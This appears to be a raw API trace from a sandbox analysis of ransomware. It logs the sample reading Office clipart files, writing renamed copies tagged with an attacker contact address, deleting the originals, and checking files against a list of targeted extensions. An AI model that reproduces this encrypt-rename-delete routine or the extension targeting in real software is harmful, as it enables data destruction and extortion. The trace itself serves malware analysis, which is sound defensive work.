	[0156.035] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.035] WriteFile (in: hFile=0x39c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.036] SetEndOfFile (hFile=0x39c) returned 1
	[0156.036] CloseHandle (hObject=0x39c) returned 1
	[0156.036] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.036] SetEndOfFile (hFile=0x384) returned 1
	[0156.038] CloseHandle (hObject=0x384) returned 1
	[0156.038] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.538] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf")) returned 1
	[0156.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.691] lstrlenW (lpString=".doc") returned 4
	[0156.691] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.691] lstrlenW (lpString=".docx") returned 5
	[0156.691] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0156.691] lstrlenW (lpString=".pdf") returned 4
	[0156.691] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.691] lstrlenW (lpString=".xls") returned 4
	[0156.691] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.691] lstrlenW (lpString=".xlsx") returned 5
	[0156.691] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0156.691] lstrlenW (lpString=".ppt") returned 4
	[0156.691] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.691] lstrlenW (lpString=".zip") returned 4
	[0156.691] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.691] lstrlenW (lpString=".rar") returned 4
	[0156.691] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.691] lstrlenW (lpString=".bz2") returned 4
	[0156.691] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.691] lstrlenW (lpString=".7z") returned 3
	[0156.691] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.692] lstrlenW (lpString=".dbf") returned 4
	[0156.692] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.692] lstrlenW (lpString=".1cd") returned 4
	[0156.692] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.692] lstrlenW (lpString=".jpg") returned 4
	[0156.692] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.692] lstrlenW (lpString=".doc") returned 4
	[0156.692] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.692] lstrlenW (lpString=".docx") returned 5
	[0156.692] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0156.692] lstrlenW (lpString=".pdf") returned 4
	[0156.692] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.692] lstrlenW (lpString=".xls") returned 4
	[0156.692] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.692] lstrlenW (lpString=".xlsx") returned 5
	[0156.692] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0156.692] lstrlenW (lpString=".ppt") returned 4
	[0156.692] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.692] lstrlenW (lpString=".zip") returned 4
	[0156.692] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.692] lstrlenW (lpString=".rar") returned 4
	[0156.692] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.692] lstrlenW (lpString=".bz2") returned 4
	[0156.692] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.692] lstrlenW (lpString=".7z") returned 3
	[0156.692] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.693] lstrlenW (lpString=".dbf") returned 4
	[0156.693] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.693] lstrlenW (lpString=".1cd") returned 4
	[0156.693] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF") returned 63
	[0156.693] lstrlenW (lpString=".jpg") returned 4
	[0156.693] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.693] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.693] lstrlenW (lpString="J0105286.WMF") returned 12
	[0156.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.694] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6568) returned 1
	[0156.694] CloseHandle (hObject=0x3c0) returned 1
	[0156.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf")) returned 0x20
	[0156.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.694] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.694] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c
	[0157.756] GetLastError () returned 0x0
	[0157.756] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x19a8, lpOverlapped=0x0) returned 1
	[0157.759] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x19b0, lpOverlapped=0x0) returned 1
	[0157.760] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.760] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0157.760] SetEndOfFile (hFile=0x29c) returned 1
	[0157.760] CloseHandle (hObject=0x29c) returned 1
	[0157.761] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.761] SetEndOfFile (hFile=0x3c0) returned 1
	[0157.762] CloseHandle (hObject=0x3c0) returned 1
	[0157.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.763] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf")) returned 1
	[0157.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.763] lstrlenW (lpString=".doc") returned 4
	[0157.764] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.764] lstrlenW (lpString=".docx") returned 5
	[0157.764] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0157.764] lstrlenW (lpString=".pdf") returned 4
	[0157.764] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.764] lstrlenW (lpString=".xls") returned 4
	[0157.764] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.764] lstrlenW (lpString=".xlsx") returned 5
	[0157.764] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0157.764] lstrlenW (lpString=".ppt") returned 4
	[0157.764] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.764] lstrlenW (lpString=".zip") returned 4
	[0157.764] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.764] lstrlenW (lpString=".rar") returned 4
	[0157.764] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.764] lstrlenW (lpString=".bz2") returned 4
	[0157.764] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.764] lstrlenW (lpString=".7z") returned 3
	[0157.764] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.764] lstrlenW (lpString=".dbf") returned 4
	[0157.764] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.764] lstrlenW (lpString=".1cd") returned 4
	[0157.764] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.764] lstrlenW (lpString=".jpg") returned 4
	[0157.764] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.764] lstrlenW (lpString=".doc") returned 4
	[0157.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.765] lstrlenW (lpString=".docx") returned 5
	[0157.765] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0157.765] lstrlenW (lpString=".pdf") returned 4
	[0157.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.765] lstrlenW (lpString=".xls") returned 4
	[0157.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.765] lstrlenW (lpString=".xlsx") returned 5
	[0157.765] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0157.765] lstrlenW (lpString=".ppt") returned 4
	[0157.765] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.765] lstrlenW (lpString=".zip") returned 4
	[0157.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.765] lstrlenW (lpString=".rar") returned 4
	[0157.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.765] lstrlenW (lpString=".bz2") returned 4
	[0157.765] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.765] lstrlenW (lpString=".7z") returned 3
	[0157.765] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.765] lstrlenW (lpString=".dbf") returned 4
	[0157.765] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.765] lstrlenW (lpString=".1cd") returned 4
	[0157.765] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF") returned 63
	[0157.765] lstrlenW (lpString=".jpg") returned 4
	[0157.765] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.766] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0157.766] lstrlenW (lpString="J0105288.WMF") returned 12
	[0157.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.766] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=15832) returned 1
	[0157.766] CloseHandle (hObject=0x3c0) returned 1
	[0157.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf")) returned 0x20
	[0157.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.767] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.767] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c
	[0157.767] GetLastError () returned 0x0
	[0157.767] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x3dd8, lpOverlapped=0x0) returned 1
	[0157.782] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x3de0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x3de0, lpOverlapped=0x0) returned 1
	[0157.783] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.783] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0157.783] SetEndOfFile (hFile=0x29c) returned 1
	[0157.783] CloseHandle (hObject=0x29c) returned 1
	[0157.783] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.783] SetEndOfFile (hFile=0x3c0) returned 1
	[0157.786] CloseHandle (hObject=0x3c0) returned 1
	[0157.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.787] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf")) returned 1
	[0157.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.787] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.787] lstrlenW (lpString=".doc") returned 4
	[0157.787] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.787] lstrlenW (lpString=".docx") returned 5
	[0157.787] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0157.787] lstrlenW (lpString=".pdf") returned 4
	[0157.787] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.787] lstrlenW (lpString=".xls") returned 4
	[0157.787] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.787] lstrlenW (lpString=".xlsx") returned 5
	[0157.788] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0157.788] lstrlenW (lpString=".ppt") returned 4
	[0157.788] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.788] lstrlenW (lpString=".zip") returned 4
	[0157.788] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.788] lstrlenW (lpString=".rar") returned 4
	[0157.788] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.788] lstrlenW (lpString=".bz2") returned 4
	[0157.788] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.788] lstrlenW (lpString=".7z") returned 3
	[0157.788] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.788] lstrlenW (lpString=".dbf") returned 4
	[0157.788] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.788] lstrlenW (lpString=".1cd") returned 4
	[0157.788] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.788] lstrlenW (lpString=".jpg") returned 4
	[0157.788] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.788] lstrlenW (lpString=".doc") returned 4
	[0157.788] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.788] lstrlenW (lpString=".docx") returned 5
	[0157.788] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0157.788] lstrlenW (lpString=".pdf") returned 4
	[0157.788] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.788] lstrlenW (lpString=".xls") returned 4
	[0157.788] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.788] lstrlenW (lpString=".xlsx") returned 5
	[0157.789] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0157.789] lstrlenW (lpString=".ppt") returned 4
	[0157.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.789] lstrlenW (lpString=".zip") returned 4
	[0157.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.789] lstrlenW (lpString=".rar") returned 4
	[0157.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.789] lstrlenW (lpString=".bz2") returned 4
	[0157.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.789] lstrlenW (lpString=".7z") returned 3
	[0157.789] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.789] lstrlenW (lpString=".dbf") returned 4
	[0157.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.789] lstrlenW (lpString=".1cd") returned 4
	[0157.789] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF") returned 63
	[0157.789] lstrlenW (lpString=".jpg") returned 4
	[0157.789] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.789] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0157.789] lstrlenW (lpString="J0105294.WMF") returned 12
	[0157.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.790] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5504) returned 1
	[0157.790] CloseHandle (hObject=0x3c0) returned 1
	[0157.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf")) returned 0x20
	[0157.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.791] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.791] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c
	[0157.791] GetLastError () returned 0x0
	[0157.791] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1580, lpOverlapped=0x0) returned 1
	[0157.801] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1590, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1590, lpOverlapped=0x0) returned 1
	[0157.802] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
